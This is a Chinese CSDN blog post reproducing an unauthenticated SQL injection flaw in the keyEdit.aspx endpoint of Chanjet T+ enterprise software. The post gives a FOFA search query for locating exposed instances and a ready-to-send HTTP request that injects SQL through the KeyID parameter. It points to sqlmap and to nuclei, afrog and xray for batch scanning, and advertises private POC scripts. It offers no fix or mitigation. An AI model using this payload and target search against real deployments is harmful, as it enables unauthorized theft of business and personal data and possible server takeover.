【漏洞复现】畅捷通T+ keyEdit.aspx SQL漏洞

已于 2024-06-23 14:29:04 修改
阅读量442 收藏 1
点赞数 7
分类专栏: 漏洞复现篇 文章标签: sql 畅捷通T+
于 2024-06-23 14:22:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60571842/article/details/139899808
版权

0x01 产品简介

畅捷通 T+ 是一款灵动,智慧,时尚的基于互联网时代开发的管理软件,主要针对中小型工贸与商贸企业,尤其适合有异地多组织机构(多工厂,多仓库,多办事处,多经销商)的企业,涵盖了财务,业务,生产等领域的应用,产品应用功能包括: 采购管理、库存管理、销售管理、生产管理、分销管理、零售管理、往来管理、现金银行管理、总账、移动应用等,融入了社交化、移动化、电子商务、互联网信息订阅等元素,为企业打造全新的生意模式、管理模式、工作模式。与传统管理软件相比,"T+"更强调企业管理向企业经营的转变、等级化管人向平等化用人理念的转变。

0x02 漏洞概述

由于畅捷通T+的keyEdit.aspx接口处未对用户的输入进行过滤和校验,未经身份验证的攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

0x03 搜索语法

app="畅捷通-TPlus"

在这里插入图片描述

0x04 漏洞复现

GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

在这里插入图片描述
sqlmap验证
在这里插入图片描述

0x05 工具批量

nuclei

在这里插入图片描述

afrog

在这里插入图片描述

xray

在这里插入图片描述

POC脚本获取

请使用VX扫一扫加入内部POC脚本分享圈子
在这里插入图片描述

SuperherRo
关注
  • 7
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
捷通T+ keyEdit.aspx SQL漏洞复现
0xSec
05-07 713
由于捷通T+的keyEdit.aspx接口处未对用户的输入进行过滤和校验,未经身份验证的攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
漏洞复现】用友-捷通T+-SQL注入-keyEdit
最新发布
知黑而守白
07-05 521
用友捷通 T+是一款基于互联网的新型企业管理软件,功能模块包括:财务管理、采购管理、库存管理等。主要针对中小型工贸和商贸企业的财务业务一体化应用,融入了社交化、移动化、物联网、电子商务、互联网信息订阅等元素。捷通T+ keyEdit.aspx接口处存在SQL注入漏洞 ,恶意攻击者可能会利用此漏洞修改数据库中的数据,例如添加、删除或修改记录,导致数据损坏或丢失。
捷通TPlus keyEdit.aspx、KeyInfoList.aspx SQL注入漏洞复现
05-16 352
捷通-TPlus是一个为中小企业设计的财税云服务平台,提供财务、税务管理和发票处理功能,支持低代码开发,帮助企业实现数字化和智能化经营管理。
漏洞复现捷通T+ keyEdit SQL注入漏洞
凝聚力安全团队
06-17 243
捷通 T+ 是一款基于互联网的新型企业管理软件,功能模块包括:财务管理、采购管理、库存管理等。主要针对中小型工贸和商贸企业的财务业务一体化应用,融入了社交化、移动化、物联网、电子商务、互联网信息订阅等元素。捷通T+ keyEdit,aspx 存在SQL注入漏洞,攻击者通过漏洞可以获取服务器数据库权限。
捷通 keyEdit.aspx SQL注入漏洞
Wulai399的博客
06-13 406
漏洞情报】
.NET 1day情报 | 复现用友某通KeyEdit注入漏洞
ahhacker86的专栏
05-06 659
用友捷通T+是一款企业管理软件,主要面向中小企业。它提供了包括财务、采购、销售、库存、生产制造、人力资源等在内的全面企业管理解决方案。通过用友捷通T+,企业可以实现对业务流程的数字化管理,提高工作效率,降低成本,增强企业竞争力。捷通T+存在前台SQL注入,导致命令执行。FOFA: app="捷通-TPlus"
复现捷通T-Plus SQL注入漏洞_68
fushuang333的博客
04-08 636
复现捷通T-Plus SQL注入漏洞,​攻击者未经授权可以访问数据库中的数据,盗取用户的隐私以及个人信息,造成用户的信息泄露。
五月份0day/1day/nday漏洞汇总
qq_39894062的博客
06-01 828
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!
ajaxFileUpload+mvc+aspx.zip
02-26
ajaxFileUpload.js上传文件 的简单例子源码.... 方便大家学习 详细请看:https://blog.csdn.net/djk8888/article/details/114132071
基于C#的学生管理信息系统,ASP.NET+SQL Server+Layui+说明.zip
05-05
基于C#的学生管理信息系统,ASP.NET+SQL Server+Layui,包含数据库文件 大二期间C#课程设计作业,版本v0.1 使用说明 将App_Data目录下的数据库文件附加至SQL Server,运行运行程序即可 后台登录界面为 admin.aspx
blog.rar_asp sql_asp+sql_博客 sql_博客系统_系统
09-19
【标题】"blog.rar" 提供的是一个基于ASP(Active Server Pages)技术和SQL数据库构建的博客系统。ASP是一种由微软开发的服务器端脚本环境,它允许开发者在网页上动态生成内容,而SQL(Structured Query Language)...
基于JAVA+jsp+sqlserver班级管理系统源码.zip
04-14
该压缩包文件“基于JAVA+jsp+sqlserver班级管理系统源码.zip”包含了开发一个班级管理系统所需的所有源代码和资源,主要使用Java编程语言、JSP(JavaServer Pages)技术和SQL Server数据库。这是一个典型的B/S...
通用防SQL注入漏洞程序(Global.asax方式)_aspx开发教程.rar
09-09
SQL注入主要是利用了程序处理用户输入时未进行充分验证的漏洞。攻击者可以通过构造特殊的输入,使Web应用在执行SQL查询时包含恶意指令。这可能导致数据泄露、权限提升甚至整个数据库的破坏。因此,对用户输入进行...
postgresql日志的配置
weixin_44847119的博客
07-03 1054
postgresql日志的配置。
如何在Oracle、MySQL、PostgreSQL中改变SQL提示格式
weixin_tank88921的博客
07-02 381
像UNIX的PS1环境变量可以改变shell操作提示符, 在日常工作环境中可以提升一些效率可以防止一些误操作, 很多年前在看tom关于在练习oracle操作前的一些环境配置像login.sql, 比起”SQL >”还可以显示当前的用户或数据库名很是欣喜, 下面记录Oracle , MySQL, PostgreSQL三个主流数据库改变命令行提示符的方法。
My sql 安装,环境搭建
2201_75643669的博客
07-03 526
以下以MySQL 8.0.36为例。
解决数据库PGSQL,在Mybatis中创建临时表报错TODO IDENTIFIER,连接池用的Druid。更换最新版本Druid仍然报错解决
番茄Salad
07-02 184
然后我找到了Druid的配置,把全部配置都注释掉,居然可以成功的执行了。然后我一个一个配置排查发现,有个filters的配置,引起的报错,只要把这个注释了,就能成功执行,不管切换什么版本的Druid。我在navicat中尝试了一下执行相同的sql创建临时表语句,确实是能执行的。然后我又进行了一次测试,在xml中的sql创建临时表语句把TEMPORARY删除,直接创建一张物理表,确实成功的执行了。在网上搜索了一下,说把Druid版本升级到最新,我试着升级到了最新,确实不报这个错误了,又报了一个新的错误。
Text2SQL中反思纠错的实战方案
热门推荐
herosunly的博客
06-29 1万+
本文主要介绍了Text2SQL中反思纠错的实战方案,希望对学习大语言模型的同学们有所帮助。 文章目录 1. 前言 2. 反思纠错的实战方案
文本显示 += 古奇.划分分割(0, (收支分类 == 0 ? "非绑古币 | " : "<a href='payInfo.aspx?type=0" + 古奇.二号书签 + "'>非绑古币</a> | ") + (收支分类 == 1 ? "绑定古币 | " : "<a href='payInfo.aspx?type=1" + 古奇.二号书签 + "'>绑定古币</a> | ") + (收支分类 == 2 ? "积分收支 | " : "<a href='payInfo.aspx?type=2" + 古奇.二号书签 + "'>积分收支</a> | ") + (收支分类 == 3 ? "金币收支" : "<a href='payInfo.aspx?type=3" + 古奇.二号书签 + "'>金币收支</a>") );上面的代码用asp.net有几种写法?
07-14
ASP.NET中,你可以使用以下两种写法来实现上述代码的功能: 1. 使用三元运算符: ``` += (收支分类 == 0 ?非绑古币 | " : "<a href='payInfo.aspx?type=0" + 古奇.二号书签 + "'>非绑古币</a> | "); += (收支分类 == 1 ? "绑定古币 | " : "<a href='payInfo.aspx?type=1" + 古奇.二号书签 + "'>绑定古币</a> | "); += (收支分类 == 2 ? "积分收支 | " : "<a href='payInfo.aspx?type=2" + 古奇.二号书签 + "'>积分收支</a> | "); += (收支分类 == 3 ? "金币收支" : "<a href='payInfo.aspx?type=3" + 古奇.二号书签 + "'>金币收支</a>"); ``` 2. 使用if语句: ``` if (收支分类 == 0) { += "非绑古币 | "; } else { += "<a href='payInfo.aspx?type=0" + 古奇.二号书签 + "'>非绑古币</a> | "; } if (收支分类 == 1) { += "绑定古币 | "; } else { += "<a href='payInfo.aspx?type=1" + 古奇.二号书签 + "'>绑定古币</a> | "; } if (收支分类 == 2) { += "积分收支 | "; } else { += "<a href='payInfo.aspx?type=2" + 古奇.二号书签 + "'>积分收支</a> | "; } if (收支分类 == 3) { += "金币收支"; } else { += "<a href='payInfo.aspx?type=3" + 古奇.二号书签 + "'>金币收支</a>"; } ``` 这两种写法都可以根据收支分类的值来拼接不同的字符串,并将结果添加到文本中。选择哪种写法取决于你的个人偏好和代码结构。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

SuperherRo

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值